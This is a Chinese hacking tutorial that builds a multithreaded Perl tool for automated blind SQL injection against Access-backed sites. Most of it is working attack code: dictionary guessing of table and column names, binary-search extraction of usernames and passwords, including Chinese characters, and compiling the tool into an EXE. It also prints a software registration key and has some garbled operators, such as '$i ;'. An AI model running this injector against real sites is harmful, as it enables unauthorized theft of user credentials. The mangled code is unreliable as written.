PERL铸造多线程 支持中文破解SQL自动注入猜解机

  • A+
所属分类:编程茶楼

说到SQL注入机,从娃娃针对动网文章的dvTxt.pl到臭要饭的绝世猜解CSC、NB联盟的NBSI,大家也都用过吧?

开天始祖 dvTxt.pl,也不知被改了多少遍,以用于针对各种不同的有SQL注入漏洞的系统,通常《黑防》的一篇《**存在SQL注入漏洞》的文章,末了,都要把这尊大佛抬出来,更改几个字段,然后,又一个**专杀工具出土了!对于臭要饭的绝世猜解CSC,我用得已经是忍无可忍了, 虽然采用了多线程技术,但是依然弥补不了算法低劣的恶劣影响,破解由于采用的是字典,不仅速度慢,同时也限制了对中文这样的双字节字符的破解,而NBSI,破解算法虽然得到了改进,但是却忘了多线程,而且在猜解表名、列名时,共用一个大字典,白白浪费掉不少时间。两个东西拼在一起就好了,可是没有原代码阿(可视化开发工具,在下也只会用VB)?! 也不知道老大们是不是用一种语言开发的,就算是同一种,就算是VB,也没有人谁愿意提供原代码阿,无奈…只好响应主席号召:自己动手,丰衣足食!

程序不过是将手动变为自动,先来痛苦地回忆一下手动注入猜解的过程:1.找到注入点->2.构造SQL查询语句->3.提交 URL->4.根据浏览器返回信息判断SQL查询语句正确性->5.修正SQL查询语句->6.重复3.4.5步N遍,直到得到数据库存储的正确信息。

翻译成程序语言:1.输入存在SQL注入漏洞的URL($url)->2.从URL中提取主机($host)、路径($path)、端口($port)->3. 构造SQL查询语句加入URL($url)->4.用IO::Socket向目标主机提交 URL ->5.从返回的页面中提取查询逻辑值为真(假)时存在的字符($info),成功则转入对下一目标值的猜解,失败则继续重复3.4.5 步。

猜解全局流程图如下:

用户信息表 - > 用户名字段 - > 密码字段 - > ID字段 - > 最小用户ID - > 用户名长度- > 密码长度 - > 用户名 - > 密码

说得有点简约,因为这些东西普及得实在厉害,更详细的内容,大家可以参阅《黑客防线》第5期的SQL注入专题,理论讲完了,大家也都情不自禁、心急火燎、磨刀霍霍……

LET’GO!

一. 提取$URL中的主机($host)、路径($path)、端口($port)

还曾记得娃娃的那个dvTxt.pl,还有它那烦琐的用法:dvTxt.pl <host> <way> <articleID> <errInfo> ,$URL一家三口被活生生的拆散,苍天啊!

在使用中,复制粘贴起来极为不便,其实,使用PERL强大的正则表达式,一却都可以迎刃而解,先来随便观察几个URL:http://www.hemon.tk/show.asp?id=957 、http://www.hemon.tk:1314/show.asp?id=957 、 http://www.hemon.tk/article/show.asp?id=957 。透过现象看本质,规律也就出来了:(http://)主机(:端口)/ 路径 。()内字符出现0或1次。

正则表达式也就有了:

程序代码:

if($url=~/(\/\/)?(. ?)\/(. )/)

{

$host=$2;

$path='/'.$3;

if($host=~/(. ):(. )/)

{

$host=$1;

$port=$2;

}

}

在“$url=~/(\/\/)?(. ?)\/(. )/”中,先要说一说那个?,?匹配0个或1个该字符,所以在输入链接的时候“http://”可有可无;匹配主机($host)的是(. ?),为什么不是(. ),因为perl默认的贪婪模式,将尽可能多的匹配至后面的字符(在这里是‘/’),所以如果不及时限定,对这样一个URL:http://www.hemon.tk/article/show.asp?id=957 ,$host将匹配至www.hemon.tk/article ,而不是我们想要的 www.hemon.tk 。

二. IO::Socket提交函数

经过刚才的努力,也该是回报的时候了,赶紧用我们提取得到的主机($host)、路径($path)、端口($port)写好这个提交函数:

程序代码:

sub connect

{

$req = "GET $path$path1 HTTP/1.0\n".

"Host: $host\n".

"Referer: $host\n".

"Cookie: \n\n";

my $connection = IO::Socket::INET->new(Proto =>"tcp",

PeerAddr =>$host,

PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

print $connection $req;

my @res = <$connection>;

close $connection;

return @res;

}

Connect 子例程将返回信息存储在数组@res中;

三. 猜解用户信息表

使用SQL查询语句:0<>(select count(*) from TABLE)

真正的破解开始了,没有什么捷径可走,顺次读取字典里存储的表名,然后一个一个的尝试,一旦成功匹配正确信息,立即退出while循环;字典有两种,一种是数组,第二是文本字典,PERL脚本我们将编译为EXE可执行文件,为了便于今后修改添加新的表名,我使用文本字典文件:

程序代码:

open (tabInput,"table.txt") or die "can't open file!\n";

while (chomp(my $input=<tabInput>))

{

my $sql="0<>(select count(*) from $input)";

$path1 = " AND $sql";

&url;

@res = &connect;

if ("@res"=~/$info/)

{

$table_user=$input;

print "the table of userinfo is:$table\n";

last;

}

}

close(tabInput);

四. 猜解字段名

使用SQL查询语句:exists (select COL_NAME from TABLE)

这一步同猜解表名如出一辙,一旦成功获取表名,我们将兵分三路,直取用户名列($field_user)、密码列($field_pass)、ID列($field_id),既然是分兵出击,就不得不使用多线程,PERL中的多线程,呵呵,你还没有试过吧?

为实现多线程作的第一个准备,编写猜解子例程(函数),我们依然使用文本字典文件,在这里,文件名作为唯一的参数传入:

程序代码:

sub field_input

{

my $field;

open (fieInput,"$_[0]") or die "can't open file!\n";

while (chomp(my $input=<fieInput>))

{

my $sql="exists (select $input from $table_User)";

$path1 = " AND $sql";

my @res = &connect;

if ("@res"=~/$info/)

{

$field=$input;

print "\t -- $field -- ";

last;

}

}

close(fieInput);

return $field;

}

五.PERL多线程速成

然后,然后当然就是学习PERL的多线程技术!!!也许现在你就开始胆战心惊,以为这有什么了不起,呵呵,80/20的瑞士军刀法则在这里又是那么管用,我们仅仅需要学习两个函数就可以结束我们的速成班:

$thread = threads->create(function, LIST)

以变量名$thread,创建一个子例程\函数(FUNCTION)的一个线程,LIST为子例程\函数的参数,CREATE可替换为NEW。

$thread->join

等待线程运行完毕。一旦结束运行,join()将返回子例程\函数(FUNCTION)的值。

THAT'S ALL!

就这么简单?完了?就这么两把菜刀就可以干我们的革命了!!!

详情参阅ActicePerl的帮助文档:Perl/html/lib/threads.html.

5、4、3、2、1、点火!!!

程序代码:

$thread1 = threads->create("field_Input","field_Username.txt");

$thread2 = threads->create("field_Input","field_Password.txt");

$thread3 = threads->create("field_Input","field_ID.txt");

回收返回仓:

程序代码:

$field_Username = $thread1->join();

$field_Password = $thread2->join();

$field_ID = $thread3->join();

同时射出三个线程,然后JOIN回来,多么完美的落地啊,10分!!!

五. 猜数字的技巧

即便是多了几匹马,马再多也没有跑不过火轮车阿,我们来研究一下猜解的技巧,回过头看看等待我们的任务:最小用户ID - > 用户名长度- > 密码长度 - > 用户名 - > 密码。

ID 值是天然的数值,长度是length($field)是数值,一位用户名和密码的ASCII码还是数值,都玩过网上的一个猜数字的JAVASCRIPT游戏吧?一个100以内的数,为什么只给你7次机会去猜?因为2^7=128,换句话说,一个128以内的数,你也只需猜7次,那么李咏节目里头那些几千上万块钱的东西,又要猜几次呢?2^13=8192, 2^14=16384,你还愁拿不到奖品吗?!

为了让大家看清楚一点,猜一个8以内的数,比如是5,步骤如下:

? < 4 N

? < 6 Y 4 2

? < 5 N 6 - 1

? = 5

也就用了三次,首先从中值(4)开始,每猜解一次加\减中值的一半(2、1),这些2^n都是固定了的,为了避免CPU的重复计算,可以根据猜解值的范围,相应预备一个数组,我准备了四个:

程序代码:

@dic1=(128,64,32,16,8,4,2,1); # 最小用户ID

@dic2=(16,8,4,2,1); # 用户名、密码长度

@dic3=(64,32,16,8,4,2,1); # 英文字符

@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1); #中文字符

算法函数如下:

sub crack

{

my(@dic) = @_;

my $sql=pop(@dic);

my $i=0;

my $op=1;

my $crack;

foreach my $pass(@dic)

{

print ">";

$i ;

$crack =$op*$pass;

$path1 = " AND $crack<($sql)";

my @res = &connect;

if ("@res" =~ /$info/)

{

$op=1;

if($i==@dic)

{

$crack ;

}

}

else

{

$op=-1;

}

}

return $crack;

}

$sql="select min($field_ID) from $table_User";

$id=&crack(@dic1,"$sql");

传递进构造的SQL注入语句以及相应的数组字典,CRACK!!!

参数为数组时,子程序只将它赋给一个数组变量,my(@dic)而非 my(@dic,$sql) =@_;后者,$sql必然为空!简单变量和数组变量是可以同时传递,$sql在此是@dic的最后一个元素。 pop(@dic)再删去列表最后一个元素($sql),并将其作为返回值,剩下的@dic就是纯洁的数字了。

让我们一鼓作气,拿下用户名和密码长度,同时,别忘了使用多线程:

程序代码:

$sql="select len($field_Username) from $table_User where field_ID=$id";

my $thread4 = threads->create("crack",@dic2,$sql);

$sql="select len($field_Password) from $table_User where $field_ID=$id";

my $thread5 = threads->create("crack",@dic2,$sql);

$userlen = $thread4->join();

$passlen = $thread5->join();

六.最后的战役-攻破字段值

使用SQL查询语句:select abs(asc(mid($fieUsername,$locat,1))) from $table_User where $field_Id = $id

这里不讨论MS-SQL中的猜测,可以说MS-SQL下是不用猜测的,你只要构造的条件足够的好,可以直接让对方在报错的时候将数据内容直接显示出来。

ACCESS 中字符的猜测:首先要判断ASCII码值是否大于零,大于,就用@dic3套到CRACK函数里面,小于就用@dic4了!函数返回数值以后,对于英文字符,有两种方法:使用nchar($asc)或者pack('C*',$asc);而对于中文字符:打开计算器,选择科学型,转换成十六进制单字,是****,用UltraEdit编辑为*字,哈哈……那就不叫编程了!

首先要用sprintf("%X",$asc)完成计算器的转换十六进制的工作,(别忘了用正则表达式提出最后四位,不然一个字前面就要冒出两个空格)然后再用pack("H*",$str)完成UltraEdit的打包作业:

程序代码:

sub asc

{

my $asc=$_[0];

my $str;

if ($asc<256)

{

$str = pack('C*',$asc);

}

else

{

$asc*=-1;

$str = sprintf("%X",$asc);

if ($str=~/(.{4})$/i)

{

$str=$1;

}

$str = pack("H*",$str);

}

return $str;

}

万事俱备,只欠东风,此仅举猜解密码值为例,一位密码启动一个CRACK子线程:

程序代码:

for (my $locat=1;$locat<=$passlen;$locat )

{

$sql = "select asc(mid($field_Password,$locat,1)) from $table_User where $field_Id=$id";

$path1 = " AND 0>($sql)";

my @res = &connect;

if ("@res" =~ /$info/)

{

$sql = "select abs(asc(mid($field_Password,$locat,1))) from $table_User where $field_Id=$id";

$password[$locat] = threads->create("crack",@dic4,$sql);

}

else

{

$password[$locat] = threads->create("crack",@dic3,$sql);

}

}

慢慢等待这些孩子们都一个个衣锦还乡吧:

程序代码:

for (my $locat=1;$locat<=$passlen;$locat )

{

$password[$locat] = $password[$locat]->join();

}

其它的显示细节,我就不要意思多说了,赶忙编译EXE。GO!

六. 编译perl为EXE

从perl2exe的老家http://www.indigostar.com/perl2exe.htm ,DOWN个最新版本的Perl2Exe for Win32,目前为止是8.40,直接解压缩,CMD命令行进入解压后的目录,为了避免浏览烦人的广告,我们先得注册一下这个软件:

程序代码:

D:\hemon\software>perl2exe -register

Perl2Exe V8.40 Copyright (c) 1997-2004 IndigoSTAR Software

Please enter your registration key, or press enter to cancel

输入我的注册码:

hemon:hemon:20040709,36713

注册成功之后显示:

Registered

同时,程序目录生成一个名为perl2exe.key的注册表文件,可千万移不得啊!

编译PL:

程序代码:

D:\hemon\software>perl2exe si.pl

Perl2Exe V8.40 Copyright (c) 1997-2004 IndigoSTAR Software

Registered to hemon:hemon:20040709, ENT version

Converting 'si.pl' to si.exe

一个多线程的、支持中文破解的PERL版注入器就诞生了!!!

大约能提高一倍的速度,也就是可以节约一半的时间,与我的预期还是有很大出入的。美中不足的是,还真应了“欲速则不达”的古语,我提供了两个版本(thr.pl\sig.pl),对于那些网速较慢的网站,呵呵…… 用了你就知道,一般人我不告诉!最好还是改用单线程的,稳定性较好。

不过,代码在手,我就不怕你会改,增强稳定性什么的,稍微加上几个函数,让它支持PHP MYSQL,ASP MSSQL什么的……

一句话:网聚人的力量!支持开放原代码!